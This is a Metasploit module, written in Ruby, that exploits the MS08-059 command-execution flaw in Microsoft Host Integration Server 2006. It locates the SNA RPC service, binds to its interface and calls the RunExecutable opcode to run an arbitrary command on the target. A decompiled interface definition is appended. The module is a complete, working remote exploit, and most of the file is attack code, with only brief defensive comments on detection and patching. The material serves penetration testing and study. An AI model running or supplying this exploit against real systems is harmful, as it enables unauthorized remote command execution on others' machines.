##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
# Auxiliary module for MS08-059 / CVE-2008-3466 (Microsoft Host Integration
# Server 2006). It locates the SNA RPC service through the DCE/RPC endpoint
# mapper, binds to interface ed6ee250-e0d1-11cf-925a-00aa00c006c1 and invokes
# opcode 0x01, which the mIDA-generated IDL at the end of this file names
# _SnaRpcService_RunExecutable (two [in][string] parameters: COMMAND and ARGS).
#
# Defensive note: the observable events are the endpoint-mapper lookup for the
# UUID above followed by a bind and a single call on that interface over
# ncacn_ip_tcp; the vendor fix is the MS08-059 update listed under 'References'.
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::DCERPC

  # Module metadata plus the two user options. RPORT defaults to 0, which
  # `run` interprets as "discover the port via the endpoint mapper".
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability',
      'Description'    => %q{
          This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.
      },
      'DefaultOptions' =>
        {
          'DCERPC::ReadTimeout' => 300 # Long-running RPC calls
        },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'MSB', 'MS08-059' ],
          [ 'CVE', '2008-3466' ],
          [ 'OSVDB', '49068' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745' ],
        ],
      'DisclosureDate' => 'Oct 14 2008'))

    register_options(
      [
        Opt::RPORT(0),
        OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),
        OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
      ], self.class )
  end

  # Discover the RPC port, bind to the interface and issue one opcode-0x01 call.
  # Prints status via print_status and returns nil; no result is computed.
  def run

    # RPORT is 0 unless the user overrides it (see Opt::RPORT(0) above).
    dport = datastore['RPORT'].to_i

    # An explicit port is refused outright; after this guard dport is always 0,
    # so the `if (dport == 0)` branch below is unconditionally taken.
    if (dport != 0)
      print_status("Could not use automatic target when the remote port is given");
      return
    end

    if (dport == 0)

      # Ask the endpoint mapper for interface version 1.0 first, then 1.1;
      # `||=` keeps the first successful lookup.
      dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp')
      dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')

      if (not dport)
        print_status("Could not determine the RPC port used by the Service.")
        return
      end

      print_status("Discovered Host Integration Server RPC service on port #{dport}")
    end

    # Connect with RPORT overridden by the discovered port for this session only.
    connect(true, { 'RPORT' => dport })

    # NOTE(review): the handle is built from datastore['RPORT'] (0 at this point)
    # rather than from the discovered dport; presumably the already-connected
    # socket is what carries the real port — confirm against the DCERPC mixin.
    dcerpc_handle('ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{handle} ...")

    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # Two NDR conformant strings, matching the two [in][string] char parameters
    # of opcode 0x01 in the IDL at the end of this file.
    cmd = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}")

    print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")

    # A missing reply is treated as the normal outcome of this call (the 300s
    # DCERPC::ReadTimeout default above exists for the same reason); any other
    # DCE/RPC exception propagates to the framework.
    begin
      dcerpc_call(0x01, cmd)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    end

    disconnect

  end
end
=begin
/*
 * IDL code generated by mIDA v1.0.8
 * Copyright (C) 2006, Tenable Network Security
 * http://cgi.tenablesecurity.com/tenable/mida.php
 *
 *
 * Decompilation information:
 * RPC stub type: inline
 */

[
  uuid(ed6ee250-e0d1-11cf-925a-00aa00c006c1),
  version(1.1)
]

interface mIDA_interface
{

  unknown _SnaRpcService_PingServer (
  );


  /* opcode: 0x01, address: 0x01002CBB */

  small _SnaRpcService_RunExecutable (
    [in][string] char arg_1,
    [in][string] char arg_2
  );

  /* opcode: 0x02, address: 0x01002F0B */

  long _SnaRpcService_CallRemoteDll (
    [in] long arg_1,
    [in][size_is(arg_1)] byte arg_2[],
    [in] long arg_3,
    [in][size_is(arg_1)] byte arg_4[]
  );

  unknown _SnaRpcService_GetInstalledDrives (
  );

  unknown _SnaRpcService_ServiceTableUpdate (
  );


  /* opcode: 0x05, address: 0x0100363C */

  long _SnaRpcService_GetWindowsVersion (
    [in] long arg_1,
    [in, out][size_is(arg_1)] byte arg_2[]
  );


  /* opcode: 0x06, address: 0x01003942 */

  small _SnaRpcService_RunExecutableEx (
    [in][string] char arg_1,
    [in][string] char arg_2,
    [in][string] char arg_3
  );


  /* opcode: 0x07, address: 0x01003BAB */

  long _SnaRpcService_GetDLCMediaType (
    [in][string] char arg_1,
    [out][ref] long * arg_2
  );


  /* opcode: 0x08, address: 0x01003E29 */

  small _SnaRpcService_UserHasAccess (
    [in] long arg_1
  );


  /* opcode: 0x09, address: 0x01004061 */

  small _SnaRpcService_ConfigureHisService (
    [in][string] char arg_1
  );


  /* opcode: 0x0A, address: 0x01004272 */

  small _SnaRpcService_ConfigureServiceAccount (
    [in][string] char arg_1
  );

}
=end